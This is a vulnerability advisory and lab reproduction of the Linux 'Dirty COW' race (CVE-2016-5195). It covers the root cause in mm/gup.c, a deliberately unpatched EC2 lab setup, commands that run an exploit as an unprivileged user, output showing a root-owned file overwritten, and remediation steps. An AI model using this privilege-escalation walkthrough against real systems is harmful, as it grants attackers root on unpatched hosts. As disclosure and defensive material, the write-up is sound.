Skip to content

CVE-2016-5195 — Dirty COW: Unprivileged Write to Read-Only Root-Owned Files

Published 2026-06-04

Verified exploitation

An unprivileged local user can overwrite any read-only memory-mapped file (including /etc/passwd and SUID binaries) on any Linux kernel from 2.6.22 through 4.8.2, achieving full root privilege escalation.

Field Value
Project Linux kernel
Affected component torvalds/linux — memory management (mm/gup.c)
Severity HIGH
CVSS 7.8 (CVSS v3.1)
CWE CWE-362 — Race Condition
Affected versions 2.6.22 (2007) through 4.8.2
Fixed version 4.8.3 (October 2016); stable backports to 3.2.82, 3.4.112, 3.10.103, 3.12.65, 3.16.37, 3.18.43, 4.1.34, 4.4.25, 4.7.8
Impact Local privilege escalation to root

1. Vulnerability Overview

The Linux kernel's memory management subsystem exposes a race condition in the get_user_pages (GUP) path, the code at mm/gup.c that resolves user-space virtual addresses to physical page frames. An unprivileged local user can exploit this race to write arbitrary bytes into the page cache of any memory-mapped file, even one that is read-only to that user. Any file on the system (configuration files, SUID executables, kernel modules) can be silently overwritten without legitimate write permission. The vulnerability became publicly known as "Dirty COW" in October 2016 and was immediately exploited in the wild; it is listed in CISA's Known Exploited Vulnerabilities catalog and tracked under GHSA-j68w-7qm9-fjqq (CVSS 7.8).

Root cause

File: mm/gup.c, functions follow_page_pte and the fault-retry loop (faultin_page / __get_user_pages).

The kernel handles a write to a private, copy-on-write (COW) mapping in two fault steps. On the first fault with FOLL_WRITE set, faultin_page calls do_cow_fault, which allocates a new page and marks it dirty but leaves the PTE read-only. On the second fault, do_wp_page detects that COW has already occurred and returns VM_FAULT_WRITE. At that point the vulnerable kernel strips the write requirement unconditionally:

/* Before (vulnerable): */
if ((ret & VM_FAULT_WRITE) && !(vma->vm_flags & VM_WRITE))
    *flags &= ~FOLL_WRITE;   // drops write requirement — race window opens

After this flag-clear the GUP loop re-enters cond_resched(). If a concurrent thread calls madvise(MADV_DONTNEED) on the mapped region in that scheduling gap, the kernel discards the COW'd page and the VMA mapping reverts to the original read-only page-cache page. The third fault then loads that original page-cache page, and the subsequent write through /proc/self/mem writes directly to the page cache, bypassing copy-on-write entirely and modifying the on-disk file without write permission.

The fix introduces a new flag FOLL_COW (0x4000) and replaces flag-stripping with flag-addition:

/* After (fixed): */
if ((ret & VM_FAULT_WRITE) && !(vma->vm_flags & VM_WRITE))
    *flags |= FOLL_COW;      // marks that COW has happened, keeps write intent

A new helper can_follow_write_pte then enforces that a FOLL_FORCE + FOLL_COW combination can only follow a write PTE when the page is both COW'd and dirty:

static inline bool can_follow_write_pte(pte_t pte, unsigned int flags)
{
    return pte_write(pte) ||
        ((flags & FOLL_FORCE) && (flags & FOLL_COW) && pte_dirty(pte));
}

The guard in follow_page_pte is updated from !pte_write(pte) to !can_follow_write_pte(pte, flags). When madvise(MADV_DONTNEED) re-loads a clean page from disk, pte_dirty returns false, and the follow is rejected, closing the race window permanently.

2. Vulnerable Environment

The environment is a single AWS EC2 instance deliberately booted on the unpatched kernel 4.4.0-21-generic (package version 4.4.0-21.37). A container-based approach cannot reproduce this bug because containers share the host's kernel; a real VM with an old kernel is required.

Stack details:

  • Instance type: c4.xlarge — Xen HVM, non-Nitro, 4 vCPUs across 2 physical cores. The two physical cores are essential: the race requires two threads to run simultaneously on separate cores. A c4.large (1 physical core, 2 SMT siblings) was tested first and the race never fired in 5 attempts; the c4.xlarge with 2 physical cores (thread_siblings_list groups 0,2 and 1,3) wins the race on the first attempt.
  • Base AMI: Canonical Ubuntu 16.04 xenial (ami-03df7ce447aba3556, ap-southeast-1).
  • Kernel installation: the exact 4.4.0-21-generic package is fetched directly from archive.ubuntu.com by .deb URL and installed with dpkg -i to avoid the package manager resolving a patched version. GRUB is pinned to the vulnerable kernel via the explicit submenu entry Advanced options for Ubuntu>Ubuntu, with Linux 4.4.0-21-generic.
  • Runtime-patching disabled: Canonical Livepatch is not installed; Ubuntu Pro is not attached.
  • ptrace_scope: set to 0 persistently via /etc/sysctl.d/10-cve-ptrace.conf, allowing the /proc/self/mem write path.
  • Target file: /opt/cve/target — owned root:root, mode 0404 (world-readable, not writable by anyone other than root). A fresh random marker is written into it on every boot by cve-baseline.service, so any observed change reflects a real write through the race rather than a pre-seeded value.
  • Unprivileged actor: lowpriv (uid 1001, gid 1001, no sudo, password locked).
  • IaC: OpenTofu on AWS (ap-southeast-1, profile cve-lab). Cost: approximately $0.234/hr (c4.xlarge on-demand + 20 GB gp2 volume).

The IaC and support files are available for download: env.zip. Individual notable files:

Confirming the environment is the vulnerable one. After provisioning, this smoke test verifies the kernel, parallelism, and target state:

cd env/tofu
export AWS_PROFILE=cve-lab
IP=$(tofu output -raw public_ip); KEY=$(tofu output -raw ssh_private_key_path)
ssh -o StrictHostKeyChecking=accept-new -i "$KEY" ubuntu@"$IP" '
  echo "== ready sentinel =="; sudo cat /opt/cve/READY 2>/dev/null || { echo NOT-READY; sudo cat /opt/cve/SUBSTRATE_FAILED 2>/dev/null; exit 1; }
  echo "== kernel ==";  uname -r
  echo "== vcpus ==";   nproc
  echo "== target ==";  stat -c "%n %U:%G %a" /opt/cve/target
  echo "== control =="; stat -c "%n %U:%G %a" /opt/cve/control-probe
  echo "== baseline exists (root channel, no value printed) =="; sudo test -s /opt/cve/target && echo BASELINE-PRESENT
  echo "== probe compiled =="; test -x /opt/cve/cowprobe && echo PROBE-READY
  echo "== ptrace_scope =="; cat /proc/sys/kernel/yama/ptrace_scope
  echo "== actor =="; id lowpriv
'

Expected: READY printed, uname -r = 4.4.0-21-generic, nproc = 4, target and control root:root 404, BASELINE-PRESENT, PROBE-READY, ptrace_scope = 0, lowpriv uid 1001.

3. How to Exploit

The exploit races two threads: one calls madvise(MADV_DONTNEED) in a tight loop on a private read-only mapping of the target file; the other opens /proc/self/mem and writes the attacker payload to the mapped address. When the scheduler interleaves them at exactly the right point, the kernel is tricked into writing through the page cache rather than the private COW copy.

The exploit script and PoC C source are available for download: exploit.zip. Individual files:

Step 1 — Verify actor identity and lack of write permission

Before running the exploit, confirm that lowpriv genuinely cannot write the target:

ssh -i ./env/tofu/lab_ssh_key.pem -o StrictHostKeyChecking=no ubuntu@13.212.231.145 \
  -t "sudo -n -u lowpriv bash -lc 'head -c 16 /opt/cve/target; echo; (echo X > /opt/cve/target) 2>&1; gcc --version | head -1'"

Expected output: the first 16 bytes of the target are printed, then Permission denied (proving lowpriv cannot write it), then a gcc version line.

Step 2 — Read the baseline (privileged channel)

Read the target's current content through the root channel before the exploit runs, so any post-exploit change is attributable to the race:

ssh -i ./env/tofu/lab_ssh_key.pem -o StrictHostKeyChecking=no ubuntu@13.212.231.145 \
  'sudo head -c 25 /opt/cve/target; echo'

Step 3 — Run the exploit

The entrypoint copies exploit/dirtyc0w.c to the host as lowpriv, compiles it with gcc -O2 -pthread, and runs rounds of the race until the payload lands or the attempt budget is exhausted:

bash exploit/run.sh ./env/tofu/lab_ssh_key.pem 13.212.231.145 /opt/cve/target DIRTYCOW-PWNED-BY-LOWPRIV 110 8

Argument summary: SSH key, host IP, target path, attacker payload string, per-round time budget (seconds), maximum number of rounds.

The PoC performs these steps on the host as lowpriv: 1. Copies exploit/dirtyc0w.c to /home/lowpriv/dirtyc0w.c. 2. Compiles: gcc -O2 -pthread dirtyc0w.c -o dirtyc0w. 3. In each round: runs ./dirtyc0w /opt/cve/target DIRTYCOW-PWNED-BY-LOWPRIV <budget>, which races madvise(MADV_DONTNEED) against /proc/self/mem writes, self-polls the file, and exits 0 when the bytes flip.

Step 4 — Confirm the exploit succeeded (independent privileged re-read)

The definitive proof of success is an independent root-level re-read of the on-disk file, not the exploit's own output:

ssh -i ./env/tofu/lab_ssh_key.pem -o StrictHostKeyChecking=no ubuntu@13.212.231.145 \
  'sudo head -c 25 /opt/cve/target; echo'

What the evidence showed in this run

The exploit won on round 1 out of a maximum of 8. The exploit's stdout read:

[orchestrator] target=/opt/cve/target payload='DIRTYCOW-PWNED-BY-LOWPRIV' per=110s rounds=8
BUILD_OK
[orchestrator] === round 1/8 ===
[*] target=/opt/cve/target size=67 payload_len=25 budget=110s threads=4m/4w
[*] mmap 0x7f98054a8000
[+] COW-WON: target first bytes overwritten with payload
[orchestrator] COW race SUCCEEDED on round 1
unpriv-read:DIRTYCOW-PWNED-BY-LOWPRIV
run.sh exit: 0

The independent root-level re-read then confirmed:

$ sudo head -c 25 /opt/cve/target  =>  DIRTYCOW-PWNED-BY-LOWPRIV
post-sha256 = b62f3a039106642fb346f47100abf0c290a507c57062d0d4692addeb47b7e1d7
od -c (full 67 bytes):
  D I R T Y C O W - P W N E D - B Y - L O W P R I V e 1 e 3 5 4 b ...   (baseline tail intact)
perms after = -r-----r-- 1 root root 67  (0404, unchanged — no legitimate write path used)

The file permissions remained 0404 throughout; the exploit never obtained write permission. The first 25 bytes changed from the fresh per-boot baseline (DIRTYCOW-BASELINE-edf42c1, SHA-256 e5e4dc5d...) to the attacker payload (DIRTYCOW-PWNED-BY-LOWPRIV, SHA-256 b62f3a03...), while the random baseline tail bytes remained intact. That pattern is the expected signature of the COW page-cache overwrite path.

To attribute the exploit result to the vulnerability, an independent reference probe (cowprobe, a separate Dirty COW racer compiled at boot) was run as lowpriv against a distinct control file /opt/cve/control-probe. It confirmed the Dirty COW code path is active on this host:

control-probe before = DIRTYCOW-CONTR...        (fresh un-won baseline after reboot)
$ sudo -n -u lowpriv /opt/cve/cowprobe /opt/cve/control-probe COWCONTROL-WON
POSITIVE-CONTROL-WON   (exit 0)
control-probe after (independent privileged re-read) = COWCONTROL-WON

The independent probe winning on a separate file confirms that the unpatched mm/gup.c TOCTOU code path is active on this host, so the candidate exploit's success cannot be attributed to unrelated causes.

Teardown

When finished, destroy the EC2 instance and all associated AWS resources:

cd env/tofu
export AWS_PROFILE=cve-lab
tofu destroy -auto-approve
rm -f env/tofu/lab_ssh_key.pem   # if any local remnant remains

This terminates the instance, removes the security group, and deletes the ephemeral key pair.

4. Security Advice

Remediation

Upgrade to Linux kernel 4.8.3 or any of the stable-branch backport releases that include the FOLL_COW fix: 3.2.82, 3.4.112, 3.10.103, 3.12.65, 3.16.37, 3.18.43, 4.1.34, 4.4.25, 4.7.8. All major distributions (Debian, Ubuntu, RHEL/CentOS, SUSE, Fedora) issued security updates in October–November 2016. The authoritative patch is commit 19be0eaffa3ac7d8eb6784ad9bdbc7d67ed8e619 in torvalds/linux.

Apply your distribution's kernel security update through its normal package manager:

# Debian / Ubuntu
sudo apt-get update && sudo apt-get install --only-upgrade linux-image-generic

# RHEL / CentOS
sudo yum update kernel

Reboot after the update to load the patched kernel.

Mitigations and workarounds

Where an immediate kernel upgrade is not possible:

  • Restrict /proc/self/mem writes. Some distributions and kernel configurations already restrict this path. Setting kernel.yama.ptrace_scope to 1 or higher (/proc/sys/kernel/yama/ptrace_scope) blocks the ptrace-based variant, though it does not fully neutralize the /proc/self/mem write path.
  • Grsecurity / PaX kernels harden the GUP path and block this class of exploit if already deployed.
  • SELinux and AppArmor policies can constrain processes from opening /proc/self/mem in write mode, limiting exploitability for confined applications; they do not protect unconfined users.
  • Runtime patching services (Canonical Livepatch, Red Hat kpatch, SUSE kGraft) were updated to cover CVE-2016-5195 shortly after disclosure. These allow applying the fix without a reboot on supported subscriptions.

References